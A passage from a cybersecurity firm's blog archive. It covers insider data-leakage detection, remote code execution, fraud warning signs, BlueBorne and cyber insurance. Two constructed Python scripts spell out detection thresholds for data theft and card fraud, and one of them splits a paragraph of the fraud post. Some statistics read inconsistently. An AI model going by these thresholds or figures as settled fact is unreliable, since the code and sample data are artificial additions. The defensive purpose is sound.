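2018-07-10T23:05:00 jsmith 3100000000
2018-07-02T09:00:00 alee 5000000
2018-07-09T10:00:00 alee 6000000
"""

OFFICE_HOURS = (8, 19)   # constructed: 08:00-18:59 on weekdays is office time
SPIKE_FACTOR = 10        # constructed: flag a day above 10x the user's median
MIN_BASELINE_DAYS = 3    # need this many earlier days before judging a day


def parse_log(text):
    """Parse the constructed format into chronologically sorted records."""
    records = []
    for line in text.strip().splitlines():
        ts, user, nbytes = line.split()
        records.append((datetime.fromisoformat(ts), user, int(nbytes)))
    return sorted(records)


def daily_totals(records):
    """{user: {date: total bytes}}."""
    totals = defaultdict(lambda: defaultdict(int))
    for ts, user, n in records:
        totals[user][ts.date()] += n
    return totals


def find_volume_spikes(records, factor=SPIKE_FACTOR, min_days=MIN_BASELINE_DAYS):
    """Compare each day with the median of that user's earlier days. The median
    (rather than the mean) keeps one spike from hiding the next one.
    Returns [(user, date, bytes_that_day, baseline), ...]."""
    alerts = []
    for user, by_day in daily_totals(records).items():
        history = []
        for day in sorted(by_day):
            if len(history) >= min_days:
                baseline = median(history)
                if by_day[day] > factor * baseline:
                    alerts.append((user, day, by_day[day], round(baseline)))
            history.append(by_day[day])
    return alerts


def find_off_hours_access(records, hours=OFFICE_HOURS):
    """Records outside office hours or on a weekend: [(user, timestamp), ...]."""
    start, end = hours
    return [(user, ts) for ts, user, _ in records
            if not (start <= ts.hour < end) or ts.weekday() >= 5]


if __name__ == "__main__":
    recs = parse_log(AUDIT_LOG)
    for user, day, total, baseline in find_volume_spikes(recs):
        print(f"volume spike: {user} {day} {total} bytes (baseline {baseline})")
    for user, ts in find_off_hours_access(recs):
        print(f"off-hours access: {user} at {ts}")
```

Both signals fire on the same two records here, which is the point of checking them together: a single late-night download of a large volume by someone whose history is small and daytime is worth a call to the compliance officer before, not after, the resignation letter arrives.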
When you need help with either establishing regular IT Audits or performing data leakage assessments, help is a phone call away. Contact us today and protect your business.
What is Remote Code Execution Attack & How to Prevent this Type of Cyberattack

Microsoft recently rolled out its latest security update, fixing 50 security vulnerabilities. Out of the 50 security vulnerabilities fixed by Microsoft in its June 12th security update, 14 allow remote code execution.

What is Remote Code Execution?

Remote code execution (RCE) refers to the ability of a cyberattacker to access and make changes to a computer owned by another, without authority and regardless of where the computer is geographically located. RCE allows an attacker to take over a computer or a server by running arbitrary malicious software (malware). "RCE (remote code execution) vulnerabilities are one of the most dangerous of its kind as attackers may execute malicious code in the vulnerable server," Imperva said.

Remote Code Execution Example #1: Microsoft Excel Remote Code Execution Vulnerability

One example of a remote code execution vulnerability is CVE-2018-8248 – one of the security vulnerabilities fixed by Microsoft in its June 12th security update. The CVE-2018-8248 vulnerability, also known as the “Microsoft Excel Remote Code Execution Vulnerability”, allows an attacker to run malware on the vulnerable computer. An attacker exploiting CVE-2018-8248 could take full control of the compromised computer if its owner logs on with administrative user rights. In taking full control of the compromised computer, the attacker could view, change or delete data; install programs; or create new accounts with full user rights. According to Microsoft, the delivery method for exploiting the CVE-2018-8248 vulnerability could be a malicious email with an attachment containing a specially crafted file that targets an affected version of Microsoft Excel.
Another delivery method for exploiting CVE-2018-8248 is a web-based attack scenario, whereby an attacker hosts a website, or uses a compromised website that accepts or hosts user-provided content, containing a specially crafted file designed to exploit the vulnerability. In both scenarios, malicious email and web-based attack, the attacker has to convince users to open the attachment or click a link that opens the specially crafted file. To date, there is no report that CVE-2018-8248 has been exploited in the wild.
Remote Code Execution Example #2: Microsoft Windows SMB Vulnerability
On May 12, 2017, hundreds of thousands of computers worldwide were infected by WannaCry, malware that encrypts computer files, locks out computer users and demands a ransom payment to decrypt or unlock the files. WannaCry, as it turns out, exploits a vulnerability that allows remote code execution when an attacker sends specially crafted messages to a Microsoft Server Message Block (SMB) server. SMB is a protocol used for sharing access to files, printers and other resources on a network. Unlike other remote code execution attacks that rely on malicious emails and web-based attacks as delivery methods, WannaCry’s delivery method was scanning the internet for vulnerable SMB ports and using one of the alleged U.S. National Security Agency (NSA) spying tools, called “EternalBlue”, which takes advantage of the vulnerability in Microsoft’s SMB. Once an attacker finds a vulnerable SMB service, DoublePulsar (another alleged NSA spying tool) is used to install the WannaCry malware. EternalBlue and DoublePulsar are 2 of the spying tools allegedly used by the NSA that were leaked in April 2017 by a group of hackers calling themselves Shadow Brokers.
According to Microsoft, the security vulnerabilities exposed by Shadow Brokers were fixed by the security update the company released in March 2017, a month before Shadow Brokers publicly released the alleged NSA spying tools. Researchers at Rendition reported that in late April and the first few days of May 2017, several days after Microsoft issued the security update fixing the vulnerabilities exposed by Shadow Brokers, more than 148,000 computers were compromised by EternalBlue and DoublePulsar. Hundreds of thousands of computers were infected by WannaCry because many compromised machines were used as servers and because of the worm, or self-propagating, capability of this malware. As a result, computers connected to the infected servers were also infected by the WannaCry malware.
Remote Code Execution Attacks and Cryptocurrency Mining
At the height of the cryptocurrency boom in December 2017, Imperva reported that cryptocurrency mining drove almost 90% of all remote code execution attacks. Imperva said 88% of all remote code execution attacks in December 2017 sent a request to an external source to try to download cryptocurrency mining malware. “These attacks try to exploit vulnerabilities in the web application source code, mainly remote code execution vulnerabilities, in order to download and run different crypto-mining malware on the infected server,” Imperva said. “The malware usually uses all CPU computing power, preventing the CPU from doing other tasks and effectively denies service to the application’s users.”
Prevention
Timely patching, that is, timely installation of software updates, ranks as the top cybersecurity measure for preventing remote code execution attacks. For instance, to prevent remote code execution via CVE-2018-8248, Microsoft’s June 12, 2018 security update has to be installed.
In the case of the WannaCry cyberattack, remote code execution via the Microsoft Windows SMB vulnerability could have been prevented if Microsoft’s March 2017 security update had been applied in time. To stop attackers from infecting vulnerable servers with cryptocurrency mining malware, the initial attack must be blocked. As an initial attack, cybercriminals typically exploit remote code execution vulnerabilities to launch their malware, similar to what the WannaCry attackers did. If your organization is using computers or servers known to run software that is vulnerable to remote code execution, the latest vendor patch mitigating that vulnerability should be applied promptly. As a rule of thumb, to significantly minimize the risk, your company must collect, analyze and act on the most recent threat intelligence. Your IT team must be equipped with the best tools to apply patches promptly, mitigating the risk of a data breach. Better yet, workstation and server patching can and should be automated to prevent remote code execution and other cyberattacks. Call us today or send an email to speak with our security experts about processes and technology to help your organization mitigate IT and cybersecurity risks.
Are You Failing to Protect Yourself Against Fraud?
Online fraud is, sadly, a common danger. More than 15 million people fell victim to it in 2016, and the risk is still very much present. Companies across all areas of industry must take steps to protect their finances, making any changes necessary to minimize threats. Some of these may seem simple, while others appear a tad more complicated. As specialists in cybersecurity, we’re dedicated to helping businesses like yours stay safe against ever-more sophisticated tactics. So, what changes can you make to your everyday operations to combat online fraud?
You Ignore the Warning Signs
Seeing new customers make large purchases can be an exciting time, but you need to be aware of some common warning signs. Orders placed late at night could be a red flag, while large orders of products that can be resold easily are another fraud giveaway to watch out for. Another red flag? Multiple attempts to buy an expensive item (or items) with the same payment method, but with minor differences in the expiration date or name. Long-time repeat customers should be watched if they make an unusual change in their purchases, address, contact details or order size. Last but not least: be wary of customers buying goods with a domestic billing address but sending the purchases to international locations. This is especially true if multiple international addresses are used.
You Don’t Invest in the Best Security
In our experience, too many businesses, both big and small, invest too little in their cybersecurity. Even though businesses are expected to spend more than $100bn on online protection in 2020, it’s still not uncommon to see companies letting themselves down. It’s easy to assume you can handle your business’s online security yourself when you first enter the market. After all, download some anti-virus software, get yourself a firewall, job done, right? Sadly, it’s not so simple. Finding the budget for high-quality security protocols can be difficult, but it’s vital: you’re reinforcing your company’s infrastructure, protecting your assets, and minimizing further expense. In other words: take the danger of online fraud seriously. Your customers and your employees are depending on you to keep their details and their salaries safe.
You Haven’t Educated Your Team
Your workforce has to be educated on the signs of online fraud, trained in criminals’ latest tactics and the techniques available to combat them. After all, they’re the people keeping your operations running day in, day out.
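The warning signs listed under “You Ignore the Warning Signs” above, written out as simple detection rules and replayed over a few constructed orders. This is an added example, not code from the original post; the thresholds (night hours, order value, product categories, customer tenure), the review threshold and the sample orders are all assumptions.

```python
"""Red-flag scoring for e-commerce orders: the warning signs from the post as
detection rules. All thresholds, categories and order data are assumptions."""
from dataclasses import dataclass
from datetime import datetime, timedelta

NIGHT_HOURS = range(0, 5)          # assumed: 00:00-04:59 local time
LARGE_ORDER_VALUE = 2000.0         # assumed "large order" threshold
RESELLABLE = {"electronics", "gift_cards", "jewelry"}   # assumed categories
ESTABLISHED_DAYS = 365             # assumed tenure of a "long-time" customer
REVIEW_THRESHOLD = 2               # scores at or above this go to manual review

@dataclass
class Order:
    order_id: str
    customer_id: str
    placed_at: datetime
    total: float
    category: str
    card_fp: str          # fingerprint (hash) of the card number
    card_name: str
    card_expiry: str      # "MM/YY"
    billing_country: str
    shipping_country: str

def score_order(order, recent, history):
    """One point per red flag. recent: other orders/attempts in the last 24h
    (any customer); history: this customer's earlier orders, oldest first."""
    reasons = []
    if order.placed_at.hour in NIGHT_HOURS:
        reasons.append("placed late at night")
    if order.total >= LARGE_ORDER_VALUE and order.category in RESELLABLE:
        reasons.append("large order of easily resold goods")
    # Same card retried with small changes to the name or expiry date.
    same_card = [o for o in recent if o.card_fp == order.card_fp]
    if any(o.card_name != order.card_name or o.card_expiry != order.card_expiry
           for o in same_card):
        reasons.append("same card retried with different name/expiry")
    # Long-standing customer whose destination or order size suddenly changes.
    if history:
        tenure = (order.placed_at - history[0].placed_at).days
        changed = (order.shipping_country != history[-1].shipping_country
                   or order.total > 3 * max(o.total for o in history))
        if tenure >= ESTABLISHED_DAYS and changed:
            reasons.append("established customer with unusual change")
    # Domestic billing, goods shipped abroad; worse when several countries appear.
    if order.shipping_country != order.billing_country:
        reasons.append("domestic billing, international shipping")
        foreign = {o.shipping_country for o in history + same_card
                   if o.shipping_country != o.billing_country}
        foreign.add(order.shipping_country)
        if len(foreign) >= 2:
            reasons.append("multiple international shipping addresses")
    return len(reasons), reasons

def review_orders(orders):
    """Replay orders in time order; return {order_id: (score, reasons)} for
    every order whose score reaches REVIEW_THRESHOLD."""
    seen, flagged = [], {}
    for o in sorted(orders, key=lambda x: x.placed_at):
        recent = [p for p in seen if o.placed_at - p.placed_at <= timedelta(hours=24)]
        history = [p for p in seen if p.customer_id == o.customer_id]
        score, reasons = score_order(o, recent, history)
        if score >= REVIEW_THRESHOLD:
            flagged[o.order_id] = (score, reasons)
        seen.append(o)
    return flagged

# Constructed sample orders (not real customer data).
SAMPLE = [
    Order("A1", "cust-1", datetime(2019, 1, 10, 14, 0), 120.0, "books",
          "fp-111", "J Smith", "03/21", "US", "US"),
    Order("A2", "cust-1", datetime(2019, 3, 12, 15, 30), 95.0, "books",
          "fp-111", "J Smith", "03/21", "US", "US"),
    # Three attempts within minutes on one card, a small change each time.
    Order("B1", "cust-2", datetime(2019, 3, 11, 2, 10), 2400.0, "electronics",
          "fp-222", "A Jones", "05/22", "US", "US"),
    Order("B2", "cust-2", datetime(2019, 3, 11, 2, 14), 2400.0, "electronics",
          "fp-222", "A. Jones", "05/22", "US", "DE"),
    Order("B3", "cust-2", datetime(2019, 3, 11, 2, 20), 2400.0, "electronics",
          "fp-222", "A Jones", "06/22", "US", "NG"),
    # Long-standing customer suddenly shipping a much larger order abroad.
    Order("A3", "cust-1", datetime(2020, 2, 1, 12, 0), 1500.0, "jewelry",
          "fp-111", "J Smith", "03/21", "US", "BR"),
]

if __name__ == "__main__":
    for oid, (score, why) in review_orders(SAMPLE).items():
        print(f"{oid}: score {score}: {'; '.join(why)}")
```

Scores are meant to queue orders for a human check, not to decline them automatically; tune the thresholds to your own order history before relying on them.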
They’re handling customers’ purchases, processing transactions, communicating with buyers, using your databases, downloading resources, and more. Uninformed staff may end up making mistakes that leave your business vulnerable, facing fraudulent activity, and ultimately at risk. When they have the information and the training, they can actually be a much-needed defense against cyber criminals preying on companies like yours. Make sure you host regular meetings to train your employees on the cyber-security threats they are likely to encounter, and the warning signs they should watch out for. This doesn’t have to be at an expert level, as you don’t want to overwhelm or confuse them, but it should be enough to give them the confidence they need to perform at their best. Your staff should know enough to identify possible fraudulent behavior, handle customers’ personal information properly, and avoid leaving your business exposed.
You Haven’t Implemented a Reliable Password Policy
Passwords have to be strong, hard to guess, and varied. Make sure your employees and your customers have the information and advice they need to avoid weak passwords. We all have so many passwords to remember today. Many of us run numerous different aspects of our lives online, relying on online banking, online shopping, online communications … it’s easy to be complacent. However, complacency leads you to use the same passwords again and again. Your customers may simply create an account and make purchases with your business, but inadvertently let someone else know what their password is. This could lead to fraudulent purchases, and the customer might blame your company for failing to offer them sufficient advice on how best to create strong passwords. It’s vital, then, to provide helpful information at the sign-up stage, and a dedicated page on your site. Make sure they know not to use something simple and easy to find out, such as their child’s name or their birthday.
Varying letter case, adding symbols and numbers, and combining words to make longer passwords can all be a big help. Your employees should follow the same strategy. Using the same password for their work emails or accounts as for their personal ones can increase your business’s vulnerability.
You Don’t Run Background Checks on Your Employees
Hiring employees with a history of criminal activity or suspicious behavior in previous roles (leading to dismissals) can be an easy way to expose your business to fraud. Running background checks may seem to be something of a hassle, but it’s well worth doing to protect your company. These should cover criminal records, education, and past employment, so that you have the information to identify who you have working for you. Trust goes a long, long way in maintaining an efficient, satisfied workforce. If you know your team is unlikely to undertake fraudulent activity and put your company’s and your customers’ data at risk, you can focus on combating external dangers instead. Employees will generally accept that these background checks are par for the course. Though it might seem intrusive, it’s for the good of your company, your clients, and your reputation. Online fraud is an intimidating area and makes businesses of all sizes feel vulnerable. Taking the steps explored above is an effective start to a stronger infrastructure, but you should trust the professionals to reinforce (and maintain) your business’s cybersecurity program for maximum protection against threats. Contact us today to assess your risks and protect your business.
Top 7 Cyber Security Tools for Your Business
With so much of our information online, everyone is vulnerable to hackers and cyber-thieves. When it comes to business, a cyber invasion is a constant threat. Short-term loss could be financial, intellectual property theft, data loss, or worse.
The real threat is the long-term loss of trust and reputation damage that could take years to repair. If your clients' information is exposed, it will be hard for them to consider it safe to give you their business again. Protect your business with these 7 cyber security tools.
7 Cyber Security Tools Your Business Must Be Using
In order to protect your business' digital information, you need a variety of cyber security tools in place. For complete peace of mind, you'll want to work with a trusted cyber security partner. In the meantime, these tools are a great place to start.
1. Malware Scanners
Malware is short for malicious software. It is designed by hackers to gain access to a computer without the owner's knowledge. You must have specific anti-malware cyber security tools in place to detect any hacker invasion. There are a variety of malware scanners out there, many even available for free (with limited features). Protect your business with automatic malware scanners in place.
2. Routine Patching
Patching is the process of installing a piece of software that repairs security flaws. Updating an app is an example of patching. Picture your business's digital infrastructure as a house. Each time you add a new application, piece of software, etc., it's like adding a new room to the house. Software, apps, and the like are built by humans, meaning that there is room for human error. Human error is like an unlocked door or unfinished window in one of the new rooms. This can leave a welcome mat out to cyber attackers. That's why your security plan needs to include routine assessments and patching.
3. Two-Factor Authentication
Use two-factor authentication to add a difficult-to-hack layer of security to your login systems. Examples include a verification code sent to a linked phone number or a piece of information only the user would know.
4. Restrictive Administrative Access
Add an additional security level for your most sensitive information and infrastructure by restricting who can access it. Click here for more information on how to implement restrictive admin mode.
5. Network Segmentation
Divide your computer network into sub-networks to improve security and performance. This allows you to isolate the most sensitive data on a specific network to limit access and decrease congestion.
6. Vulnerability Scanning
There's no better way to assess your security levels than a vulnerability scan. Try our free vulnerability assessment to find weaknesses in your code and how to remedy them.
7. 24/7 Security Monitoring
Cyber security protection doesn't come in the form of a quick fix. Continually protect your business' data with a 24/7 security monitoring system in place to catch attacks the minute they happen.
Protect Your Business for Peace of Mind
Cyber security tools are of the utmost importance for businesses and individuals alike. Questions? Let us know if there is anything we can help you with. Our emergency response team is available 24/7 if you're currently dealing with a cyber attack. Contact us today.
New Bluetooth Malware Puts Billions of Devices at Risk
A new piece of malicious software dubbed “BlueBorne” puts billions of Bluetooth-enabled devices at risk.
Understanding Bluetooth
Dr. Jaap Haartsen invented Bluetooth while working at Ericsson in the 1990s. Bluetooth was named after the 10th-century king of Denmark, Harald Blåtand (“Bluetooth” in English), who famously united Scandinavia. Just as King Bluetooth united Scandinavia, Dr. Haartsen’s invention unites, or connects, devices.
Bluetooth is currently the most widely used protocol for short-range communications. It's used in a wide range of devices, from personal computers to smartphones, consumer electronics (smart TVs, printers), medical and health devices, home automation and autonomous cars. Bluetooth is now licensed, managed and maintained by the Bluetooth Special Interest Group (SIG). Tech giants Google, Microsoft, Apple, Intel and IBM are some of the group's members.
How BlueBorne Works
1. BlueBorne attacks devices via Bluetooth.
The security research firm Armis first identified the BlueBorne malware. Its researchers found that BlueBorne specifically exploits security flaws in Bluetooth-enabled devices running Windows, Android, iOS versions before 10 and Linux, regardless of the Bluetooth version in use. This means that every computer, mobile device or IoT device running one of the above-mentioned operating systems is at risk. There are currently 2 billion Android users, 500 million Windows 10 users, 1 billion Apple users, and 8 billion IoT users. Affected devices include all Android phones, tablets and wearables (except those using only Bluetooth Low Energy), all Windows computers since Windows Vista and all Linux devices, such as the Samsung Gear S3, Samsung Smart TVs and Samsung Family Hub.
2. BlueBorne spreads through the air.
BlueBorne is alarming because it operates through the air. Unlike traditional cyber attacks, no action is required from the victim to enable the BlueBorne attack: there is no need to download a malicious file or click on a link. Once the malware detects that Bluetooth is active on a device running Windows, Android, iOS before version 10 or Linux, it attacks the device even though the target isn’t paired with the attacker’s device or set to discoverable mode. “Unlike the common misconception, Bluetooth enabled devices are constantly searching for incoming connections from any devices, and not only those they have been paired with,” Armis said. To initiate BlueBorne, the attacker must be near the targeted user and the Bluetooth feature of the target user's device must be turned on. Billions of devices are at risk as Bluetooth is turned on by default on many devices. Many users also prefer to leave Bluetooth on most of the time to conveniently connect to keyboards, headphones and various other IoT devices.
The airborne operation of BlueBorne is problematic in the following ways:
a) Highly Infectious
Spreading from one device to another through the air makes BlueBorne highly infectious, and because the Bluetooth process enjoys high privileges on all operating systems, exploiting Bluetooth gives hackers full control over the device.
b) Bypasses Traditional Cyber Security Measures
As BlueBorne is spread through the air, it bypasses traditional cyber security measures. Typical security measures are defenseless against airborne attacks. BlueBorne attackers can bypass secure internal “air-gapped” networks, a security measure that isolates a computer or network and prevents it from establishing an external connection. "These silent attacks are invisible to traditional security controls and procedures. Companies don't monitor these types of device-to-device connections in their environment, so they can't see these attacks or stop them," Yevgeny Dibrov, CEO of Armis, said in a statement. "The research illustrates the types of threats facing us in this new connected age."
3 Ways BlueBorne Attackers Could Exploit Your Device
1. Take Full Control of Your Device for Criminal Activities
BlueBorne attackers could remotely execute code on your vulnerable device, allowing them to take full control over your device and access corporate networks, systems and data. With full access to your device, hackers could perform criminal activities, including ransomware and data theft.
2. Create Large Botnets Similar to the Mirai Botnet
The Mirai botnet uses compromised IoT devices to carry out crippling Distributed Denial of Service (DDoS) attacks. In 2016, crippling DDoS attacks were waged against the website of cyber security blogger Brian Krebs and a French web hosting company. BlueBorne attackers, for instance, could use your compromised device, together with other compromised devices, to execute a DDoS attack against a particular website.
3. Perform Man-in-the-Middle Attacks
BlueBorne attackers could perform a man-in-the-middle attack on your device. A man-in-the-middle attack happens when attackers redirect the communication between two users through the attackers’ computer without the knowledge of the original two users. “An attacker who successfully exploited this vulnerability could perform a man-in-the-middle attack and force a user's computer to unknowingly route traffic through the attacker's computer,” Microsoft said in its September 12, 2017 security bulletin. “The attacker can then monitor and read the traffic before sending it on to the intended recipient.” Microsoft calls this Bluetooth vulnerability the "Microsoft Bluetooth Driver Spoofing Vulnerability".
How to Prevent BlueBorne Attacks
1. Turn Bluetooth Off
The safest way to prevent a BlueBorne attack is to turn off the Bluetooth feature on your device. This malware can reach your device only while Bluetooth is active. If it’s turned off, the malware can’t successfully infiltrate your device.
2. Update Your Operating System
It’s advisable to keep your operating system up to date. Not all operating systems, though, have patched or issued a security update that fixes the BlueBorne vulnerability. According to Armis, it informed Google about the BlueBorne issue on April 19, 2017. Google released a public security update and security bulletin on September 4th, 2017. Microsoft was informed by Armis about the BlueBorne issue on April 19, 2017. Microsoft released security updates on July 11, 2017. Apple was informed about BlueBorne on August 9, 2017. Apple corrected this vulnerability with its latest iOS and tvOS. Linux was informed by Armis on August 15 and 17, 2017 and on September 5, 2017. As of September 12, 2017, Armis said, Linux hadn't yet issued a public security update to patch the BlueBorne vulnerability.
Is Cyber Insurance for Small and Medium Businesses Worth the Cost?
More than one-third (36%) of Canadian firms don’t have cyber security insurance, according to a survey conducted by research and consultancy firm Ovum for Silicon Valley analytics firm FICO.
This number, however, is relatively high compared to the global average (40%) and the percentage of firms in the U.S. that have no cyber security insurance (50%).
Reasons Why Some Organizations Hesitate to Get Cyber Security Insurance
Here are some of the reasons why some organizations hesitate to get cyber security insurance:
1. Organizations Often Don’t Understand Cyber Risks or Their Insurance Options
In the report "Demystifying cyber insurance coverage: Clearing obstacles in a problematic but promising growth market", researchers from the Deloitte Center for Financial Services found that many organizations, including large, medium and small businesses, often aren’t aware of the cyber risks confronting them, let alone the insurance coverage options available to them.
2. Lack of Understanding as to What Type of Cyber Risk Is and Isn’t Covered under Existing Insurance Policies
Of the Canadian firms in the FICO survey that have cyber security insurance, only 18% said their policy covers all likely risks. In the case of The Brick Warehouse LP v Chubb Insurance Company of Canada, the Court of Queen’s Bench of Alberta decided on June 29, 2017 that Brick isn’t entitled to recover its loss from insurer Chubb. The case arose from a social engineering cyber fraud scheme. In 2010, the accounting department of Brick received bogus calls and emails from an individual claiming to be a representative of Toshiba, one of Brick’s suppliers. The imposter asked a Brick employee to change the bank account to which payments supposedly destined for Toshiba were sent. A total of $338,322.22 was transferred into the “new” account. Brick filed a claim with its insurer Chubb, asserting that under its cyber security insurance policy Chubb would pay for direct loss resulting from funds transfer fraud by a third party. “Certainly, the emails with the fraudulent instructions were from a third party,” the Court of Queen’s Bench of Alberta said. “The actual transfer instructions, however, were issued by a Brick employee. There was no one forcing the employee to issue the instructions, there were no threats of violence or other harm. The employee was simply a pawn in the fraudster’s scheme.
Therefore, the transfer was not done by a third party.” According to the Deloitte report, cyber security insurance policy terms and conditions in Canada have yet to be battle-tested, as case law isn’t clear. The Brick Warehouse LP v Chubb Insurance Company of Canada is the first case decided by a Canadian court with respect to cyber crime insurance coverage.
3. Concern about Cyber Security Insurance Value
The Deloitte report showed that many organizations still wonder whether the cyber security insurance coverage being offered by insurers is sufficient for the risks they face. The Deloitte report revealed that current cyber insurance policies are often capped with relatively low limits for the risks being covered, which may be discouraging more organizations from getting cyber insurance. The report added that cyber insurance coverage for emerging cyber risks may not yet be widely available or affordable. Twenty percent of the FICO survey respondents felt that the premiums calculated for their business don’t accurately reflect their risk profile.
4. Lack of Standardization around Cyber Insurance Offerings
Given that the cyber insurance market is relatively new, insurance coverage terms, conditions and exclusions are still not standardized. The 2016 SANS Institute and Advisen, Ltd. study (PDF) found that information security officers of organizations and insurance professionals don’t speak the same language when defining and quantifying cyber risks, resulting in different expectations, actions and justifications for outcomes. The 2017 “Cyber Insurance Market Watch Survey” (PDF) by the Council of Insurance Agents & Brokers found that cyber insurance companies each have their own policy language, which makes it difficult to compare coverage and terms. More than a quarter (26%) of the FICO survey respondents felt that the introduction of an established industry standard to benchmark cyber security risk would be beneficial.
Importance of Getting Cyber Security Insurance
"While digitisation is revolutionising business models and transforming daily lives, it is also making the global economy more vulnerable to cyber-attacks,” Lloyd's and Cyence said in the report "Counting the cost Cyber exposure decoded".
“Without cyber-risk insurance, organizations are leaving themselves in a very vulnerable position,” said Kevin Deveau, vice president and managing director of FICO Canada. “It’s important for businesses to assess the strength of their cybersecurity defences and to make sure they are covered if they are faced with a data breach.” Legislation is expected to drive demand for cyber insurance cover, particularly surrounding data and privacy. In Europe, the implementation of the EU law General Data Protection Regulation (GDPR) in 2018 is expected to drive the demand for cyber insurance, as the EU law introduces new fines for failing to adequately protect sensitive data and mandates that companies notify the authorities and the individuals affected by a data breach. According to Lloyd's and Cyence, “Demand for cyber insurance is also anticipated to increase penetration in Europe as a result of the General Data Protection Regulation coming into force next year, with the threat of penalties for breaches driving coverage.” In Canada, the upcoming implementation of the Digital Privacy Act is expected to drive the demand for cyber insurance. It amends Canada’s Personal Information Protection and Electronic Documents Act. The Digital Privacy Act became law in June 2015. The law’s implementation is held in abeyance until the government issues the implementing regulations. The 2015 law requires organizations to report any significant, potentially harmful security breach of personal information to Canada’s Privacy Commissioner and to immediately inform the affected individuals and organizations. Non-compliance with the notification requirements may lead to fines of up to $100,000 per violation. “The ripple effect of a breach can be felt throughout the organization for a very long time, especially now that Canada’s Digital Privacy Act will require organizations to report any breaches to regulators and customers,” the vice president and managing director of FICO Canada said.
Author: Steve E. Driz, I.S.P., ITCP
3/11/2019